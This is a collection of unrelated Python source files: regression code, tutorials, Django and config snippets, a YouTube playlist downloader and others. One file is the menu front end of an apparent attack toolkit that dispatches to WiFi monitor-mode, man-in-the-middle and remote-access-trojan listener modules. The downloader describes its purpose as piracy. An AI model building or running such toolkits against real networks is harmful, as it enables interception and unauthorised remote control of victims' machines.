num_friends =[100,49,41,40,25,21,21,19,19,18,18,16,15,15,15,15,14,14,13,13,13,13,12,12,11,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8,8,8,8,8,8,8,8,8,8,8,8,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
daily_minutes = [1,68.77,51.25,52.08,38.36,44.54,57.13,51.4,41.42,31.22,34.76,54.01,38.79,47.59,49.1,27.66,41.03,36.73,48.65,28.12,46.62,35.57,32.98,35,26.07,23.77,39.73,40.57,31.65,31.21,36.32,20.45,21.93,26.02,27.34,23.49,46.94,30.5,33.8,24.23,21.4,27.94,32.24,40.57,25.07,19.42,22.39,18.42,46.96,23.72,26.41,26.97,36.76,40.32,35.02,29.47,30.2,31,38.11,38.18,36.31,21.03,30.86,36.07,28.66,29.08,37.28,15.28,24.17,22.31,30.17,25.53,19.85,35.37,44.6,17.23,13.47,26.33,35.02,32.09,24.81,19.33,28.77,24.26,31.98,25.73,24.86,16.28,34.51,15.23,39.72,40.8,26.06,35.76,34.76,16.13,44.04,18.03,19.65,32.62,35.59,39.43,14.18,35.24,40.13,41.82,35.45,36.07,43.67,24.61,20.9,21.9,18.79,27.61,27.21,26.61,29.77,20.59,27.53,13.82,33.2,25,33.1,36.65,18.63,14.87,22.2,36.81,25.53,24.62,26.25,18.21,28.08,19.42,29.79,32.8,35.99,28.32,27.79,35.88,29.06,36.28,14.1,36.63,37.49,26.9,18.58,38.48,24.48,18.95,33.55,14.24,29.04,32.51,25.63,22.22,19,32.73,15.16,13.9,27.2,32.01,29.27,33,13.74,20.42,27.32,18.23,35.35,28.48,9.08,24.62,20.12,35.26,19.92,31.02,16.49,12.16,30.7,31.22,34.65,13.13,27.51,33.2,31.57,14.1,33.42,17.44,10.12,24.42,9.82,23.39,30.93,15.03,21.67,31.09,33.29,22.61,26.89,23.48,8.38,27.81,32.35,23.84]
def predict(alpha, belta, x_i):
    """Value of the fitted line alpha + belta*x evaluated at x_i."""
    return belta * x_i + alpha
def error(alpha, belta, x_i, y_i):
    """Residual: observed y_i minus the line's prediction at x_i."""
    predicted = belta * x_i + alpha  # inlined predict() for locality
    return y_i - predicted
def sum_of_squared_error(alpha, belta, x, y):
    """Total squared prediction error of the line over paired samples x, y."""
    total = 0
    for x_i, y_i in zip(x, y):
        residual = y_i - (alpha + belta * x_i)  # inlined error()/predict()
        total += residual ** 2
    return total
def least_squares_fit(x,y):
    """Ordinary least squares for y ~ alpha + beta*x.

    Closed form: beta = corr(x, y) * sd(y) / sd(x) and
    alpha = mean(y) - beta * mean(x), using the helpers from the
    project's Statistic module (imported as st).
    """
    beta = st.correlation(x,y)*st.standard_derivation(y)/st.standard_derivation(x)
    alpha = st.mean(y) - beta * st.mean(x)
    return alpha,beta
alpha,beta = least_squares_fit(num_friends,daily_minutes)
print alpha,beta
def total_sum_of_squares(y):
    """Sum of squared deviations of y from its mean (st.de_mean centers y)."""
    return sum(v**2 for v in st.de_mean(y))
def r_squared(alpha, beta, x, y):
    """Coefficient of determination: fraction of variance explained by the fit."""
    residual = sum_of_squared_error(alpha, beta, x, y)
    total = total_sum_of_squares(y)
    return 1 - residual / (1.0 * total)
print r_squared(alpha,beta,num_friends,daily_minutes)
|
19,736 | 193a8e967fc4c9a8421f53f9f9a9023c29fe24ca | import sys
import os
from .util import bcolors, clear, RepresentsInt
from ..attack.mitm import start
from ..attack.wifi import normalMode, monitorMode, startWifi
from ..attack.rat import listen
import atexit
@atexit.register
def restore():
    """Exit hook: put the wireless interface back into managed mode.

    Relies on the external `ship` tool: `ship -i` prints the current
    interface and `ship -A` lists all interfaces -- TODO confirm flags.
    """
    interface = os.popen('ship -i').read()
    # Array of interfaces
    interArr = os.popen('ship -A').read().split(' ')
    # 'Local' in the output means no single interface was reported; fall
    # back to the second entry of the interface list -- NOTE(review): verify.
    if 'Local' in interface:
        interface = interArr[1]
    # Restore wifi: monitor-mode interfaces carry 'mon' in their name.
    if 'mon' in interface:
        normalMode(interface)
    print(bcolors.OKGREEN + "\nRestoring system settings." + bcolors.ENDC)
def run():
    """Main menu loop: show modules, dispatch the chosen one, repeat.

    NOTE(review): the loop is implemented by recursion; a long session will
    grow the call stack -- consider a while-loop if that matters.
    """
    clear()
    # Print loaded modules
    printModule()
    # Take user input as int
    choice = input("\n" + bcolors.BOLD +
                   "Please choose an option\n> " + bcolors.ENDC)
    if (RepresentsInt(choice)):
        # Convert in int
        choice = int(choice)
        # Dispatch to the selected module, then re-enter the menu.
        if choice == 1:
            clear()
            # print(bcolors.FAIL + "WIP" + bcolors.ENDC)
            startWifi()
            run()
        elif choice == 2:
            clear()
            # run mitm
            start()
            # Recursion
            run()
        elif choice == 3:
            clear()
            # Run RAT Listener
            listen()
            run()
        elif choice == 4:
            clear()
            print(bcolors.OKGREEN + "Goodbye!" + bcolors.ENDC)
            sys.exit(0)
        else:
            # Integer outside 1-4: re-prompt.
            clear()
            print(bcolors.FAIL + "Please input a valid option." + bcolors.ENDC)
            run()
    else:
        # Non-integer input: re-prompt.
        clear()
        print(bcolors.FAIL + "Please input a valid option." + bcolors.ENDC)
        # Recursive loop
        run()
def printModule():
    """Print the numbered menu of loaded modules."""
    print(str(bcolors.HEADER + "Loaded Modules: " + bcolors.ENDC))
    entries = (
        "1) WiFi Module",
        "2) MITM Module",
        "3) RAT Module",
        "4) Exit boa",
    )
    for entry in entries:
        print(entry)
|
19,737 | 3f019a16af0cfffec420e784e6e8348f1127734c | #3. 내장 자료형의 기초
#1 Numeric types
#1-1 Integer literals (decimal, octal, hexadecimal)
a = 23
b = 0o23
c = 0x23
print(type(a), type(b), type(c))
print(a, b, c)
import sys
print(sys.maxsize)
#1-2 Floating-point literals
a = 1.2
b = 3.5e3
c = -0.2e-4
print(type(a), type(b), type(c))
print(a, b, c)
print()
#1-3 Arbitrary-precision ("long") integers
#Precision is unlimited as long as memory allows
h1 = 12345678912345678901234556970
print(type(h1))
print(h1*h1)
print()
#1-5 Rebinding numeric values
x = 1
x = 2
#The value 1 held by x is not modified; x is re-bound to the new object 2
#1-6 Built-in functions for numeric operations
print(abs(-3))
print(int(3.141))
print(int(-3.131))
print(float(5))
print(complex(3.4, 5))
print(complex(6))
print(divmod(5, 2))
print()
print(pow(2,3))
print(pow(2.3,3.5))
#1-7 Numeric functions from the math module
import math
print(math.pi)
print(math.e)
print(math.sin(1.0))
print(math.sqrt(2))
print()
r = 5.0
a = math.pi
degree = 60.0
rad = math.pi * degree / 180.0
print(math.sin(rad), math.cos(rad), math.tan(rad))
#2 Strings
#2-1 String literal forms
print('Hello World!')
print("Hello World!")
#Multi-line string form
multiline = """
To be, or not to be
that is the question
"""
print(multiline)
multiline2 = '''
To be, or not to be
that is the question
'''
print(multiline2)
#2-2 Indexing and slicing
s = 'Hello world!'
print(s[0])
print(s[1])
print(s[-1])
print(s[-2])
s = 'Hello world!'
print(s[1:3])
print(s[0:5])
print()
s = 'Hello'
print(s[1:])
print(s[:3])
print(s[:])
print()
s = 'abcd'
print(s[::2])
print(s[::-1])
#Strings are immutable.
s = 'Hello World'
#s[0] = 'h'
#So to "change" a string, build a new one with slicing and concatenation.
s = 'h' + s[1:]
print(s)
#2-3 String operators
# + : concatenation, * : repetition
print('Hello' + '' + 'World')
print('Hello' * 3)
print('-' * 60)
#2-4 String length
s = 'Hello World'
print(len(s))
#2-5 Substring membership
#in, not in: keywords that test whether a substring occurs in a string
s = 'Hello World'
print('World' in s)
print('World' not in s)
|
19,738 | ec041b7463f5a55f7db43ec81323326f45a95573 | import os
# Application configuration. os.getenv-backed entries fall back to
# local-development defaults when the environment variable is unset.
CONFIG = {
    "place_snowball_stem": True,
    "anonymize": True,
    "db_user": "kaira",
    "db_admin": os.getenv("DB_ADMIN_NAME") or "postgres",
    "db_name": "learning-from-our-past",
    # NOTE(review): env value is a str but the default is an int -- confirm consumers accept both.
    "db_port": os.getenv('DB_PORT') or 5432,
    "users_whose_edits_can_be_overridden": ["kaira"] # Changes made by these users will not be preserved in the db
}
|
19,739 | 35c12b4c1bba8b4768012e6a7a1c2fbfe0b4954e | from .StocksResponseSchema import StocksResponseSchema #noqa |
19,740 | c9f0bceb15620033b70e3387a85b17ba5f5e73ef | from django.contrib import admin
from django.urls import path
from django.urls import include, path
from CAM import views
# URL routes for the CAM app; the bare app root reuses the probe view.
urlpatterns = [
    path('', views.probe, name='CAM'),
    path('probe/', views.probe, name='CAM_probe'),
    path('measure/', views.measure, name='CAM_measure'),
    path('cnc/', views.cnc, name='CAM_cnc'),
]
|
19,741 | 4d3274ec641b070e7f68e2b60d141bc1d5e1eda2 | """
4) Baseando-se no exercício 3 adicione um método construtor que permita
a definição de todos os atributos no momento da instanciação do objeto.
"""
from secao17_heranca_polimorfismo.exercicios1.questao3 import Quadrado
class Quadrado2(Quadrado):
    """Square whose attributes can be set at instantiation (exercise 4).

    The exercise asks for a constructor that lets all attributes be
    defined when the object is created; the original took no arguments
    and always passed 0 to the parent.
    """

    def __init__(self, lado=0):
        """Constructor delegating to the parent class.

        lado: initial side length. Defaults to 0 so existing callers
        that used Quadrado2() keep working unchanged.
        """
        super().__init__(lado)
if __name__ == "__main__":
    # Manual check: set the side after construction, then print the state
    # after each computation.
    q1 = Quadrado2()
    q1.lado = 87.9
    q1.imprimir()
    q1.calcular_area()
    q1.imprimir()
    q1.calcular_perimetro()
    q1.imprimir()
|
19,742 | 84b8b49074ad007c460259cbb12ea89644d73ec5 | import uuid
# from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.contrib.sites.models import Site
from django.contrib.sites.managers import CurrentSiteManager
from django.urls import reverse
from autoslug import AutoSlugField
class Organization(models.Model):
    """A site-scoped organization owned by a SaasyProfile."""
    name = models.CharField(_("Name"), max_length=80)
    # Stable external identifier, independent of the mutable slug.
    uuid = models.UUIDField(_("UUID"), default=uuid.uuid4, editable=False, unique=True)
    # URL key derived from name; always_update means it tracks renames.
    slug = AutoSlugField(populate_from='name', unique=True, always_update=True)
    site = models.ForeignKey(Site, on_delete=models.CASCADE, related_name="organizations") # Overwriting this field from Base Class to change the related_name
    # NOTE(review): presumably True marks a single-user "personal" org -- confirm.
    personal = models.BooleanField(default=False)
    owner = models.ForeignKey('saasy.SaasyProfile', verbose_name=_("Organization Owner"), on_delete=models.CASCADE, related_name="organizations") # The top level person who controls the whole org
    objects = models.Manager()          # unfiltered manager
    on_site = CurrentSiteManager()      # manager restricted to the current Site
    class Meta:
        verbose_name = _("Organization")
        verbose_name_plural = _("Organizations")
    def __str__(self):
        return self.name
    def get_absolute_url(self):
        """URL of this organization's detail page."""
        return reverse( "saasy:organization-detail", kwargs={"slug": self.slug})
    def get_update_url(self):
        """URL of this organization's edit page."""
        return reverse( "saasy:organization-update", kwargs={"slug": self.slug})
    def get_delete_url(self):
        """URL of this organization's delete confirmation page."""
        return reverse( "saasy:organization-delete", kwargs={"slug": self.slug})
    def get_membership_url(self):
        """URL of this organization's membership management page."""
        return reverse( "saasy:membership-update", kwargs={"slug": self.slug})
|
19,743 | fb4d070ce758058c4842d44ee2b72281847dbf33 | # Percorrendo frases (strings) com while
frase = 'Ola seja bem vindo!'
contador = 0
while contador < len(frase):
print(frase[contador])
contador += 1
frase_2 = 'O rato roeu a roupa do rei de roma.'
contador_2 = 0
nova_frase = ''
while contador_2 < len(frase_2):
letra = frase_2[contador_2]
if letra == 'r':
nova_frase += 'R'
else:
nova_frase += letra
contador_2 += 1
print(nova_frase) |
19,744 | 666d6351ddda072fa7cd1114c2ecdcdf69ad689a |
def count_lines(path):
    """Return the number of lines in the text file at *path*.

    Fixes two defects in the original script: it compared strings with
    ``is not`` (identity, not equality -- a CPython-interning accident),
    and it called ``readline()`` twice per iteration, silently skipping
    every other line and undercounting.
    """
    count = 0
    with open(path, "r") as file:
        for _ in file:
            count += 1
    return count


if __name__ == "__main__":
    print(count_lines("denemeee.txt"))
19,745 | 38f5fb0a7e9b5fa6c2feef5d860ef35c0a90f3f1 | import numpy as np
import math
import matplotlib.pyplot as plt
from .demo import get_topology, plot_mesh_general
from ..opt.optimizer_robot import heart_shape
from .. import arguments
def plot_mesh(args):
    """Render the mesh from the first linear solution file (u000000.vtu)."""
    path = args.root_path + '/' + args.solutions_path + '/linear/u000000.vtu'
    plot_mesh_general(path)
def plot_sol(args, name):
    """Plot the scalar field `name` ('u' or 'f' in __main__) from the first
    linear solution file and save it as images/linear/<name>.png."""
    path = args.root_path + '/' + args.solutions_path + \
        '/linear/' + name + '000000.vtu'
    x, u, tri = get_topology(path)
    colors = u
    fig = plt.figure(figsize=(8, 8))
    plt.gca().set_aspect('equal')
    plt.axis('off')
    # Flat-shaded triangulation colored by the nodal values.
    tpc = plt.tripcolor(x[:, 0], x[:, 1], tri, colors,
                        shading='flat', vmin=None, vmax=None)
    cb = plt.colorbar(tpc, aspect=20, shrink=0.5)
    cb.ax.tick_params(labelsize=20)
    fig.savefig(args.root_path + '/images/linear/' +
                name + '.png', bbox_inches='tight')
def plot_L(args):
    """Plot L-infinity error curves (AmorFEA vs supervised training) on a
    log scale and save them as images/linear/L.png."""
    path_a = args.root_path + '/' + args.numpy_path + '/linear/L_inf_a.npy'
    path_s = args.root_path + '/' + args.numpy_path + '/linear/L_inf_s.npy'
    # Drop the last entry of each saved series before plotting.
    L_inf_a = np.load(path_a)[:-1]
    L_inf_s = np.load(path_s)[:-1]
    truncate_idx = 31  # only the first 31 epochs are displayed
    print(L_inf_s)
    print(L_inf_a)
    fig = plt.figure()
    ax = fig.gca()
    epoch = np.arange(0, len(L_inf_a) , 1)
    ax.plot(epoch[:truncate_idx], L_inf_a[:truncate_idx], linestyle='--',
            marker='o', color='red', label='AmorFEA')
    ax.plot(epoch[:truncate_idx], L_inf_s[:truncate_idx], linestyle='--', marker='o',
            color='blue', label='Supervised Training')
    ax.set_yscale('log')
    ax.legend(loc='upper right', prop={'size': 12})
    ax.tick_params(labelsize=14)
    fig.savefig(args.root_path + '/images/linear/L.png', bbox_inches='tight')
    # plt.yticks(np.arange(min(L_inf_a), max(L_inf_a)+1, 1.0))
    # ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
if __name__ == '__main__':
    # Generate every figure for the linear demo, then display them.
    args = arguments.args
    plot_mesh(args)
    plot_sol(args, 'f')
    plot_sol(args, 'u')
    plot_L(args)
    plt.show()
|
19,746 | 8753f8228f5eabc823cd92d235a05541e38e7cfc | #https://keflavich-astropy.readthedocs.io/en/latest/coordinates/observing-example.html
#https://docs.astropy.org/en/stable/coordinates/
import astropy as ast
from astropy.coordinates import SkyCoord, EarthLocation, AltAz, get_body, ICRS
import datetime
from ICRS_coordinates import ICRS_coordinates
class coordinates_manager():
    """Resolves a sky target into local Alt/Az coordinates for the observer
    location configured via setLocation()."""

    def __init__(self):
        self.lat = 0.0        # observer latitude (degrees)
        self.lon = 0.0        # observer longitude (degrees)
        self.height = 0.0     # observer elevation
        self.utcoffset = 0.0  # local-time offset (astropy hours once set)
        self.loc = None       # astropy EarthLocation, set by setLocation()
        self.target = None    # astropy SkyCoord, set by setTarget()
        self.az = 0.0         # last computed azimuth (degrees)
        self.alt = 0.0        # last computed altitude (degrees)

    def setLocation(self, lat, lon, height, utc_offset):
        """Configure the observer's geographic position. Returns True."""
        self.lat = lat
        self.lon = lon
        self.height = height
        self.utcoffset = utc_offset * ast.units.hour
        # Fixed: the height argument was ignored and a literal 200 was passed.
        self.loc = EarthLocation(lat=lat, lon=lon, height=height)
        # Work offline: do not fetch IERS Earth-rotation tables.
        ast.utils.iers.conf.auto_download = False
        return True

    def setTarget(self, s, target_type):
        """Resolve target *s* into a SkyCoord.

        target_type: 0 = NGC/Messier catalog lookup, 1 = solar-system body,
        2 = name resolution via SkyCoord.from_name. Returns False when a
        catalog lookup fails, True otherwise.
        """
        if target_type == 0: #NGC or Messier Object
            a = ICRS_coordinates()
            if a.setObject(s) == True:
                objCoor = a.getICRSCoord()
                self.target = SkyCoord(frame=ICRS,ra=objCoor[0]*ast.units.deg, dec=objCoor[1]*ast.units.deg)
            else:
                return False
        elif target_type == 1: #solar system object
            self.target = get_body(s, time=ast.time.Time(datetime.datetime.now())-self.utcoffset) #Remember to take into account UTC offset!
        elif target_type == 2: #other
            self.target = SkyCoord.from_name(s)
        return True

    def getCoordinate(self):
        """Return the target's current Alt/Az as a decimal string 'az alt'."""
        ctime = datetime.datetime.now() #current time (according to this computer)
        # Convert to an astropy Time object and shift local time to UTC.
        t = ast.time.Time(ctime)
        t -= self.utcoffset
        # Transform the target into the Alt/Az frame for this time and place.
        target_altaz = self.target.transform_to(AltAz(obstime=t,location=self.loc))
        return target_altaz.to_string('decimal')

    def updateCoordinate(self):
        """Refresh the cached az/alt from getCoordinate(). Returns True."""
        # The decimal string is "<az> <alt>"; split on the first space
        # (replaces the original manual first-space scan).
        az_str, alt_str = self.getCoordinate().split(' ', 1)
        self.az = float(az_str)
        self.alt = float(alt_str)
        return True
|
19,747 | 910736f28f7dd846b7b226b15c03f3dc10f2829c | from output.models.nist_data.atomic.short.schema_instance.nistschema_sv_iv_atomic_short_white_space_1_xsd.nistschema_sv_iv_atomic_short_white_space_1 import NistschemaSvIvAtomicShortWhiteSpace1
# Sample instance of the generated NIST atomic-short whitespace model.
obj = NistschemaSvIvAtomicShortWhiteSpace1(
    value=-6402
)
|
19,748 | 6f38106b13a4a6024283a8553d072e9ebac56ec9 | # -*- coding: utf-8 -*-
'''
YouTube Playlist Downloader
Gurjot Sidhu, 2017
MIT License
Requirements: Python 2.7+/3.x, pafy, bs4, youtube-dl
Provide the URL for a YouTube playlist and the script will download all the
songs in the playlist (up to 100; will add a fix soon) to your local drive.
The file format is .m4a which should work with iTunes.
I recommend using EasyTAG to add ID3 tags to your files.
'''
from __future__ import print_function
from __future__ import unicode_literals
import os
import pafy
import re
import subprocess
import youtube_dl
from string import punctuation
#==============================================================================
# ENTER THE URL FOR THE PLAYLIST HERE
#==============================================================================
print("Pro Tip: To paste press Alt + Space, then select Paste from the Edit menu.\n")
PLAYLIST_URL = str(raw_input("Enter the playlist URL: "))
#==============================================================================
# If you want an MP3 file change the 0 below to 1 (default format is .m4a)
#==============================================================================
print("\nThe default file format is .m4a/.aac (the iTunes one). But there is also an option to download MP3 files.\n")
FORMAT_CHOICE = raw_input("Do you want to download MP3 files? (y/n) ")
if str(FORMAT_CHOICE).lower() == 'y':
FORMAT_MP3 = True
print("Cool. Downloading MP3 files then.\n")
else:
FORMAT_MP3 = False
print("Cool. Downloading m4a/AAC files then.\n")
#==============================================================================
# ENTER THE LOCATION FOR WHERE YOU WANT THE DOWNLOADED FILES TO BE PLACED
#==============================================================================
print("All downloaded files will be placed in the Downloaded Music folder in this directory.\n")
FOLDER_LOCATION = "./Downloaded Music/"
#==============================================================================
# IGNORE EVERYTHING FOLLOWING THIS
#==============================================================================
playlist_json = pafy.get_playlist(PLAYLIST_URL)
titles = []
ids = []
for item in range(len(playlist_json['items'])):
titles.append(playlist_json['items'][item]['playlist_meta']['title'].encode('ascii','ignore'))
ids.append(playlist_json['items'][item]['playlist_meta']['encrypted_id'].encode('ascii','ignore'))
class MyLogger(object):
    """No-op logger handed to youtube-dl to silence its console output."""

    def debug(self, msg):
        """Discard debug messages."""
        return None

    def warning(self, msg):
        """Discard warnings."""
        return None

    def error(self, msg):
        """Discard errors."""
        return None
def get_filename(input_title):
    """Sanitize a video title into a safe file name.

    Removes bracketed annotations, collapses whitespace and strips
    punctuation (keeping dashes). Fixes three broken patterns from the
    original: r'\[^]*\)' never matched square brackets, r'\p{P}(?<!-)'
    is not supported by the re module (it matched nothing), and runs of
    whitespace were replaced with '' which glued words together.
    """
    # Normalize to str (Python 2: non-str i.e. unicode -> ascii bytes;
    # checking str first keeps this working on Python 3 too, where
    # `unicode` does not exist).
    if isinstance(input_title, str):
        replacement_title = input_title
    else:
        replacement_title = input_title.encode('ascii', 'ignore')
    # Remove round and square brackets together with their contents.
    replacement_title = re.sub(r'\([^()]*\)', '', replacement_title)
    replacement_title = re.sub(r'\[[^\[\]]*\]', '', replacement_title)
    # Drop trailing whitespace and collapse internal runs to one space.
    replacement_title = re.sub(r'\s+$', '', replacement_title)
    replacement_title = re.sub(r'\s\s+', ' ', replacement_title)
    # Remove punctuation except dashes (includes the old '|' removal).
    replacement_title = re.sub(r'[^\w\s-]', '', replacement_title)
    replacement_title = replacement_title.strip(punctuation)
    return str(replacement_title)
def check_existence(title):
    """Return True when title.m4a or title.mp3 already exists in the
    download folder, False otherwise."""
    existing = os.listdir(FOLDER_LOCATION)
    return any(title + ext in existing for ext in (".m4a", ".mp3"))
def get_m4a(title, video_id):
    """Download a video's best m4a audio stream via pafy.

    Falls back to get_mp3() when pafy cannot open the video; returns
    True/False only on the fallback paths (the success path returns None).
    """
    video_url = str("https://www.youtube.com/watch?v="+video_id)
    # Check if video is available
    try:
        video = pafy.new(video_url)
    # except IOError:
    #     print("Nope. Looks like this video is unavailable. Skipping it.\n")
    #     return False
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt -- consider narrowing.
        print("There seems to be a problem with this video. Trying to download mp3 version instead.\n")
        try:
            get_mp3(title, video_id)
            return True
        except:
            print("Nope. Looks like this video is unavailable. Skipping it.\n")
            return False
    # Fetch audio
    audio = video.getbestaudio(preftype="m4a")
    FILE_LOCATION = str(FOLDER_LOCATION + title + ".m4a")
    try:
        audio.download(FILE_LOCATION)
    except:
        print("Looks like there's a problem. Skipping it.\n")
def get_mp3(title, video_id):
    """Download a video's audio as a 192 kbps MP3.

    Tries the youtube_dl Python API first; on any failure falls back to
    invoking the youtube-dl command-line tool with equivalent flags.
    """
    video_url = str("https://www.youtube.com/watch?v="+video_id)
    # youtube-dl options: best audio, transcode to mp3, stay quiet and
    # route all of its messages through the no-op MyLogger.
    ydl_opts = {
        'format': 'bestaudio',
        'postprocessors': [{
            'key': 'FFmpegExtractAudio',
            'preferredcodec': 'mp3',
            'preferredquality': '192',
        }],
        'quiet': True,
        'ignoreerrors': True,
        'logger': MyLogger(),
        'outtmpl': str(FOLDER_LOCATION + title + '.%(ext)s')
    }
    try:
        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
            ydl.download([video_url])
    except:
        # NOTE(review): bare except; the CLI fallback assumes youtube-dl is on PATH.
        subprocess.call(str('''youtube-dl -i --quiet --extract-audio --audio-format mp3 -o "''' + FOLDER_LOCATION + title + '.%(ext)s" ' + video_url), shell=True)
#==============================================================================
# Download the shit
#==============================================================================
for i in range(len(ids)):
replacement_title = get_filename(titles[i])
print(str("Now downloading: "+replacement_title))
# Check if file already exists
if check_existence(replacement_title):
print("This file already exists in the downloads folder. Skipping it.\n")
continue
if FORMAT_MP3:
get_mp3(replacement_title, ids[i])
else:
get_m4a(replacement_title, ids[i])
print("\nBoom. Done. Rejoice in your piracy now.")
|
19,749 | b3b5365cc0d25dc5049bdf2e348edcbd1cd7e3e2 | from bge import logic
import pickle
scores_file_path = logic.expandPath('//scores/scores.txt')
def _saveScoresToFile(scores_file_path, scores):
scores_file = open(scores_file_path, 'wb')
pickle.dump(scores, scores_file)
scores_file.close()
def _loadScoresFromFile(scores_file_path):
try:
file = open(scores_file_path, 'rb')
return pickle.load(file)
except IOError:
print('Unable to load scores.txt at "{}":'.format(scores_file_path))
print('...will create one at game over')
return []
scores = _loadScoresFromFile(scores_file_path)
def display():
    """Insert the player's final score into the high-score table and render
    the top 10 entries with spawned Writer text objects."""
    scene = logic.getCurrentScene()
    writer = scene.objectsInactive['Writer']
    name = logic.globalDict['Name']
    last_score = logic.globalDict['Score']
    entry = (name, last_score)
    scores.append(entry)
    # we have to sort scores, but scores it's a list of tuples
    scores.sort(key = lambda entry : entry[1], reverse = True)
    last_entry_index = scores.index(entry)
    # Show at most the first 10 entries, one Writer clone per row.
    for entry, i in zip (scores, range(10)):
        spawened_in_writer = scene.addObject(writer, writer)
        spawened_in_writer.localScale = writer.localScale
        spawened_in_writer.worldPosition.y -= 0.5*i
        spawened_in_writer.text = '{:d} - {:s} - {:.3f}'.format(i+1, entry[0], entry[1])
        # Highlight the row of the score just achieved.
        if i == last_entry_index:
            spawened_in_writer.state = 1
        # NOTE(review): the save runs once per displayed row -- hoisting it
        # out of the loop would save only once; confirm intent.
        _saveScoresToFile(scores_file_path, scores)
def setName():
    """Store the typed player name (surrounding whitespace stripped) in globalDict."""
    scene = logic.getCurrentScene()
    name = scene.objects['Name']
    logic.globalDict["Name"] = name.text.strip()
def setScore():
    """Store the Timer object's 'Text' property in globalDict as the score."""
    scene = logic.getCurrentScene()
    last_score = scene.objects['Timer']['Text']
    logic.globalDict['Score'] = last_score
|
19,750 | 48a464a56a83edac7bb76eb8a7419ddbc654d388 | print(5/2)
tax=5/2
print(tax) |
19,751 | b819152021e04110cb3e14d6b8566d390234fd2d | # -*- coding: utf-8 -*-
"""
The Extractor receives a URL and tries to estimate its type
(HTML, PDF, XML...)
"""
import datetime
from bs4 import BeautifulSoup
from urllib import request
from logzero import logger
class Extractor(object):
    """Fetches a URL and extracts its visible text with BeautifulSoup.

    Fixes relative to the original: `basestring` is Python 2 only and
    raised NameError in this Python 3 file; `__exit__` lacked the
    exception parameters the context-manager protocol passes; and the
    elapsed time was computed negated.
    NOTE(review): the class defines __exit__ but no __enter__ -- it is not
    yet usable in a `with` statement; confirm intent.
    """

    def __init__(self, parser="", url=""):
        """Record the creation timestamp and remember the parser and URL."""
        self.initTime = datetime.datetime.now().timestamp()
        self.url = url
        self.parser = parser

    def parseUrl(self, url):
        """Download *url*, parse it with the configured parser and return its text."""
        assert isinstance(url, str), "argument url must be a string"
        self.url = url
        with request.urlopen(self.url) as response:
            html = response.read().decode('utf8')
        self.soup = BeautifulSoup(html, self.parser)
        return self.soup.get_text()

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        """Log the object's lifetime in seconds on context exit."""
        self.endTime = datetime.datetime.now().timestamp()
        logger.info(self.endTime - self.initTime)
|
19,752 | 84e160fa3848dc9c25b24e697654ddff68f6be78 |
# coding: utf-8
# # [CptS 111 Introduction to Algorithmic Problem Solving](http://piazza.com/wsu/fall2016/cpts111/home)
# [Washington State University](https://wsu.edu)
#
# [Gina Sprint](http://eecs.wsu.edu/~gsprint/)
# # L4-2 More Functions
#
# Learner objectives for this lesson
# * Understand why functions are useful to use when designing programs and solving problems
# * Understand the execution flow of a program
# * Recognize the scope of a name (identifier)
# ## Why Use Functions?
# * Break a large, complex solution into logical units
# * Individual members of a programming team can work on each unit independently
# * Procedural abstraction
# * The calling function need not be aware of the details of how a function works—just what it does
# * Thus, during high-level problem solving activities, we won't get bogged down in detail
# * Reuse
# * Recall our comment on the original version of the program to compute and display the gpa of classes
# * Redundant: Much code was duplicated
# * Why re-write sections of code that have already been written and tested?
# * Functions allow us to package up a well-designed solution into a **bite-size chunk that can be reused over and over**
# * Name a group of statements for easier reading and debugging
# * Testing
# * Allows for more efficient testing and bug resolution
# * Each function is tested as it is implemented
#
# ## How Functions are Executed
# * When a function is called, memory for local variables is allocated
# * Memory is released upon completion of function execution (local function variables do not "outlive" function)
#
# Example: Recall the function `display_gpa()`:
# In[5]:
def display_gpa(gpa):
    """Print the final GPA, formatted to two decimal places."""
    message = "Your GPA is: %.2f" % (gpa)
    print(message)
# In a function call such as `display_gpa(3.4)`, the value 3.4 is considered the argument of the function. When the function is executed, the value 3.4 is *copied* into a **new local variable**, `gpa`. We call `gpa` a local variable because the variable is only accessible within `display_gpa()` on this particular functional call (`display_gpa(3.4)`).
#
# ## Scope
# **Scope of a name**: region of a program where a particular meaning of a name is viible or can be referenced.
#
# ### Global Variables
# Variables declared outside of a function are considered *global*. In general, global variables are a [bad idea](http://c2.com/cgi/wiki?GlobalVariablesAreBad) and we try to avoid using them.
#
# ### Local Variables
# Parameter variables and variables declared within a function are considered *local*. Local variables are only visible from within that function; once function is done, variables go away (space is deallocated). Consider the following example:
# In[3]:
max_val = 950  # global: visible inside every function defined below
def one(anarg, second):
    '''
    Scope demo: anarg, second and one_local exist only inside one().
    '''
    one_local = 0
def fun_two(one, anarg):
    '''
    Scope demo: the parameter `one` shadows the global function one() here.
    '''
    local_var = 0
def main():
    '''
    Driver: calls both demo functions; its local_var is independent of
    the local_var inside fun_two().
    '''
    local_var = 0
    one(0, 1)
    fun_two(5, 10)
main()
limit = 200  # bound only after main() has run, so not visible during the calls above
# When each of the above functions is executed, what is the scope of the following identifiers?
#
# |Name|visible in `one()`|visible in `fun_two()`|visible in `main()`|
# |----|------------------|----------------------|-------------------|
# |`max_val`|y|y|y|
# |`limit`|n|n|n|
# |`main`|y|y|y|
# |`local_var` (local variable in `main()`)|n|n|y|
# |`one` (function)|y|n|y|
# |`anarg` (parameter in `one()`)|y|n|n|
# |`second`|y|n|n|
# |`one_local`|y|n|n|
# |`fun_two`|y|y|y|
# |`one` (parameter in `fun_two()`)|n|y|n|
# |`anarg` (parameter in `fun_two()`)|n|y|n|
# |`local_var` (local variable in `fun_two()`)|n|y|n|
# ## Body-less Functions
# You can define a function without adding a body by simply placing the reserved keyword `pass` in the body. This can be useful when you want to test your program one function at a time or when you want to organize your program without actually writing the functions (or as a placeholder if someone else is writing the function). Example:
